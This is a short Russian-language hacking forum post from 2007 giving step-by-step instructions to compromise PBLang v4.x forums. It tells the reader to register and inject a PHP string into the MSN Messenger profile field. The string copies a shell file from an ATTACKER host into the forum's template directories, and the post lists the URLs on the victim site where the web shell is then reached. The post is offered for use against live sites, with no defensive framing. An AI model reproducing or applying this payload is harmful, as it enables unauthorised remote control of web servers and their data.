Форумы PBLang v4.x shell exploit

Discussion in 'Уязвимости CMS/форумов' started by fly, 11 May 2007.

  1. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Вот если кто не знал , есть такой способ взлома . Ребята изи NST.Void молодцы!

    Code:
    Всё давольна проста:

1. Заходим на форум в отдел регистрации
2. Вводим имя и пароль
3. в окошко MSN Messenger добовляем строчку:

";?><? copy("http://ATTACKER/shell.txt","templates/pb/images/ranks/shell.php"); copy("http://ATTACKER/shell.txt","templates/shell.php"); ?><?#

далее жмём регистрироватся, залогинимся..
далее идём по сылке:

http://VICTIM/path-to-forum/templates/shell.php
или
http://VICTIM/path-to-forum/templates/pb/images/ranks/shell.php
    Много где стоит!!!
     
    #1 fly, 11 May 2007
    2 people like this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.